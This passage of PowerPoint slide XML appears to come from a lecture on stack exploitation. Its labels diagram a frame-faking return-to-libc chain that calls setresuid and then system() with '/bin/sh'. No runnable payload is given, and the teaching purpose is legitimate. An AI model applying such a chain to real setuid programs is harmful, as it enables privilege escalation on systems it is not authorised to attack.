          <a:xfrm flipV="1">
            <a:off x="8867855" y="52006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432" name="Line 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6962855" y="52006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433" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7870905" y="4423173"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211438" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6962855" y="22288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fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211439" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6962855" y="19431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system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211440" name="Rectangle 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6962855" y="16573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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211441" name="Rectangle 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6962855" y="13716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“/bin/sh0”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1211442" name="Line 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6962855" y="10858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443" name="Line 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8867855" y="10858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1211444" name="Text Box 52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7039055" y="2800351"/>
            <a:ext cx="1388522" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>the stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>moves to fake2 and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>the parameters are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>“popped”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Line 87"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2268542" y="3943350"/>
            <a:ext cx="0" cy="12573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68" name="Line 88"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="363542" y="3943350"/>
            <a:ext cx="0" cy="125730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69" name="Line 89"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2268542" y="52006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70" name="Line 90"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="363542" y="52006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71" name="Rectangle 91"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1271592" y="4423173"/>
            <a:ext cx="184666" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Rectangle 94"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="33718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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Rectangle 95"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="30861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ruid (param 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Rectangle 96"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="28003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euid (param 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Rectangle 97"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="25146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suid (param 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Rectangle 98"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="22288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fake2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Rectangle 99"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="19431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system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Rectangle 100"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="165735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epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Rectangle 101"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="13716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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>addr of “/bin/sh0”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Line 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="363542" y="10858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81" name="Line 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2268542" y="1085850"/>
            <a:ext cx="0" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Rectangle 104"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="363542" y="3657600"/>
            <a:ext cx="1905000" cy="28575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200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> to fake2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text Box 105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="439743" y="4114802"/>
            <a:ext cx="1521570" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This is the situation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>before returning from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>() to an </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="84" name="Group 83"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="29240" y="3657747"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="Right Arrow 84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="636587" y="1719067"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="right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86" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="571297" y="1752600"/>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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87" name="Group 86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="29240" y="5086497"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Right Arrow 87"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="990600"/>
              <a:ext cx="457200" cy="3810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89" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468110" y="1024133"/>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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="90" name="Group 89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2205703" y="3371997"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="Right Arrow 90"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="990600"/>
              <a:ext cx="457200" cy="3810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92" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468110" y="1024133"/>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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93" name="Group 92"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4378403" y="2171700"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Right Arrow 93"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="636587" y="1719067"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="right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95" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="571297" y="1752600"/>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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="96" name="Group 95"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4416503" y="2271324"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="Right Arrow 96"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="990600"/>
              <a:ext cx="457200" cy="3810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98" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468110" y="1024133"/>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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="99" name="Group 98"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6626465" y="1017986"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Right Arrow 99"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="636587" y="1719067"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="right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101" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="571297" y="1752600"/>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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="102" name="Group 101"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6618527" y="1943100"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="468110" y="990600"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="103" name="Right Arrow 102"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="990600"/>
              <a:ext cx="457200" cy="3810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104" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="468110" y="1024133"/>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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="105" name="Group 104"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2201308" y="2237567"/>
            <a:ext cx="522490" cy="285750"/>
            <a:chOff x="571297" y="1719067"/>
            <a:chExt cx="522490" cy="381000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="106" name="Right Arrow 105"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="636587" y="1719067"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="right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000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Text Box 105"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="571297" y="1752600"/>
              <a:ext cx="415498" cy="328295"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Light"/>
                  <a:cs typeface="Roboto Light"/>
                </a:rPr>
                <a:t>EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180426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1139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1139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1139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11398"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect" nodePh="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="begin" delay="0">
                                      <p:tn val="53"/>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12113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1140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1140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1140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1140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1140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1140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1140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1140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1140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1140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1141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11411"/>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8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21141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1141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1141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11415"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="99" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect" nodePh="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="begin" delay="0">
                                      <p:tn val="99"/>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="121141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1141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114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1141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1142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1142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21142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21142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1142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1142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21142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11428"/>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9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9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1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1211412"/>
